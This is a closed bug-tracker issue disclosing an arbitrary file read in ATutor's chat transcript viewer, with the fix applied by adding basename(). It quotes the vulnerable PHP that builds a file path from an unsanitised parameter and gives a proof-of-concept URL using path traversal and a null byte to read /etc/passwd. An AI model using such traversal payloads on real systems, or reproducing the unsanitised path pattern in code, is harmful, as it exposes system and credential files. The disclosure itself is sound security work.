MantisBT

View Issue Details Jump to Notes ] Issue History ] Print ]
IDProjectCategoryView StatusDate SubmittedLast Update
0005657ATutoratutor.capublic2016-03-19 11:592016-06-30 17:43
Reportermr_me 
Assigned Tomr_me 
PriorityhighSeverityminorReproducibilityalways
StatusclosedResolutionfixed 
PlatformUnixOSOS Version
Product Version2.2.1 
Target Version2.2.1Fixed in Version2.2.1 
Summary0005657: Arbitray file read in mods/_standard/chat/manage/view_transcript.php
DescriptionAgain, auth not required... it can be bypassed

$file = AT_CONTENT_DIR . 'chat/'.$_SESSION['course_id'].'/tran/'.$_GET['t'].'.html';
if (!file_exists($file)) {
        $msg->addError('FILE_NOT_FOUND');
        header('Location: index.php');
        exit;
}
require(AT_INCLUDE_PATH.'header.inc.php');
@readfile($file)

PoC:
http://172.16.175.152/ATutor/mods/_standard/chat/manage/view_transcript.php?t=../../../../../../../../../etc/passwd%00&h= [^] [^]
TagsNo tags attached.
Affects versionSVN
SVN Revision#5da4de65b9eb141bd75d8fd6a7b1b863e0369e6d
Attached Files

- Relationships

-  Notes
(0007362)
mr_me (developer)
2016-03-21 10:09

patch: https://github.com/atutor/ATutor/pull/116 [^]
(0007369)
greg (administrator)
2016-03-23 20:05

added basename() to prevent abitrary file reading
(0007457)
greg (administrator)
2016-06-30 17:43

Close for 2.2.2

- Issue History
Date Modified Username Field Change
2016-03-19 11:59 mr_me New Issue
2016-03-19 11:59 mr_me Status new => assigned
2016-03-19 11:59 mr_me Assigned To => greg
2016-03-21 10:09 mr_me Note Added: 0007362
2016-03-23 20:05 greg SVN Revision# => 5da4de65b9eb141bd75d8fd6a7b1b863e0369e6d
2016-03-23 20:05 greg Note Added: 0007369
2016-03-23 20:05 greg Status assigned => resolved
2016-03-23 20:05 greg Fixed in Version => 2.2.1
2016-03-23 20:05 greg Resolution open => fixed
2016-03-23 20:05 greg Assigned To greg => mr_me
2016-06-30 17:43 greg Note Added: 0007457
2016-06-30 17:43 greg Status resolved => closed


Copyright © 2000 - 2017 MantisBT Team
Powered by Mantis Bugtracker